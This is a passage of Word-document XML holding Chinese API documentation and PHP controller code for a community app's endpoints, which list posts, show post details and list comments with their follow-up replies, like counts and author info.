    <w:p w14:paraId="7CDD53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社区动态列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD5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348E14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49C059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码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733884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              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2F2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data.image_urls  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA49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_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点赞次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E4B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cai_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点踩次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8BF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ping_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态评论数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236334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share_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态分享次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0C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is_top    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否置顶：</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42C27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is_selected </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否加精：</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9699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username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B33E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img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516E9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uthor_follow_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5687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uthor_article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者发表文章数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A66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       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该动态：</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47DA8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follow    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否关注该动态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49518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pings        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>前两条评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE45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s.*.author_username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B8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s.*.author_img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF242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DC9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s()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5CA8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C84B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 = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D096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input('param.member_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE13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ype_ids = input('param.type_ids', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3958F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top = input('param.is_top', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F1D4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selected = input('param.is_selected', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4984B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03691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72EB11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Db::name('circle_article');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F00A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id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC58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where('circle_id', $circle_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529BF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E01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 '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE24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where('member_id', $member_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D14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0569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s != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA7F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where('type_id', 'in', $type_ids);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD5FD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705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top != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CF8B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where('is_top', $is_top);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BC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E2D7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selected != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35840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where('is_selected', $is_selected);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257EAC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B478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articles-&gt;order('create_time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3171D5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771829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74FCE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articles['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26551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rticles['data'] as $key =&gt; $article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B315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 = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79473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s'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFBBC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 != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207D7D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 = _imgUrl() . $article['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093765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2EC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s'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E51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article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D22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image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECF3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s'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4C8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10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A65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB5ED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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01775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follow_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D5E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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F615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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55944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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358305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7E767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member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21068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1C3D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article['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187EA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764DB6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author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F7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author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503B34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rticles['data'][$key]['author_follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5CB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225B60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6908E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circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4D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article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248FE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0B726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article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D46D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article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314AD7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F4B60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C37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9D73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Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61597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40D204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53F80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6C97F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CA31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Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3705F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7A82A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00BCCD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6170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4DB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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D638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1D55AA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2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A81E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509F0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s) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496E3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s as $k =&gt; $ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234CA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username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE993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img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC62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ping['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ECD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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50640D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username'] = $member['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29624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img'] = $member['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CF78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4A9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817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372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pings'] = $pings;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D27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91D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1AA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ticles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB70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9B3E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B610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article </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得社区动态详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619BF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社区动态详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37950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6BCBC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3C04D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037827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33A24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社区动态详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743C4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_id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B4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String} title       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2BDB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社区动态内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0FF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escription </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态内容描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6905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image_urls   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77024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uthor_username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAD7D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uthor_img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6B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uthor_follow_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448BF1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uthor_article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者发表文章数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5F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当前用户是否点赞该动态：</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B74E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关注该动态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DF613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24528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C2034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910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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3874B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D62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04BDC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7E87B4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732B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301107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85FB6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FAC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1777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095D61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5E6B8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F460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1BEE6D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24E6A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3F01D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click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A09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image_url'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6012A6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image_urls'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468A2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 != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E28B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image_url'] = _imgUrl() . $article['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0BE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BF8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s'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC31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article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDB00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image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A494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image_urls'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA6D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72D2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0204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username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407BAB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img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6365E7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follow_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576D3D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article_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2F6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zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C455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follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2D2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0099FB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member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E49D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2E81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article['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE7C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40F7B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rticle['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B35E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img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F366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follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4624A5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06FFF8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4F6D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article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF86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article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB8B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2425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uthor_article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66028E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article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B216B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C2479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463E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7D59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zan'] = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474059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_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9F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35EB8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277B5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2A24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follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DF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1230B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73034C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09AA1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23D4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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A90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_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0379F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780F4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E2AC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s) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A7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s as $key =&gt; $ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E375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ey]['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE33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6D89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ey]['zan'] = Db::name('circle_article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A3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469C1E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6E44C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5EE2B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AC2F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D6C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 = Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA8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3EE99A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22D2C5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3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFD6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35CB44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_xias) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52014C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_xias as $k =&gt; $ping_xia) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E672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zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B0EB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B3460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zan'] = Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435D5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6FE27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xia_id', $ping_xia['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C1A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25AFB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1B7B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EFDE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111E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ey]['ping_xias'] = $ping_xias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B8C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8456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ey]['ping_xias'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09551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8F9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5A0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ings'] = $pings;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323912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27DA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ings'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B5D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CC53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ticle);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFD2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32E6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ECB70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5D9958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5EEC2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F40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642B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E2C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pings </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得社区文评论列表（附加三条追评）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23646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社区动态评论列表（附加三条追评）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D58D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35325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6F549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6B0A2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0047B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5966F0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5D192D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社区动态列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F02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total           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA5E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per_page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602951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urrent_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C27C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               </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D400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username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C503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img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D556A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             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该评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0DC6C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ping_xias           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评数据集合（至多三条追评）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B46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_xias.*.author_username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该追评作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BC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_xias.*.author_img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该追评作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4A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ping_xias.*.zan             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该追评：</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05353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E8C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s()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52568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9FA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51D661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28785F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E80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5C8DB2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3174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CBB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2D21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395DF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id', $article_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0E8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6170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1DC4AD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D3411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7198F4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13F6E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69C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421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2A0571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2DE12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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328159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_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276265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04D732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4EBDB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5F987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s['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76968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s['data'] as $key =&gt; $ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD51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author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4D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author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C06D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zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45294D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ping['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83D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4A2B4E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author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A75DD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author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA6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A37D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3136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zan'] = Db::name('circle_article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAC11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33273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033D8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6995C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29A8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74D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 = Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3704F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id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D96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3302EA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3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F51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2F05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_xias) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9933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_xias as $k =&gt; $ping_xia) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42668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ey]['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71772D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ey]['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041CA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zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12F4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ping_xia['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243CE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4FAD1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ey]['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F133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ey]['author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA78D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E93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A3CD4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k]['zan'] = Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
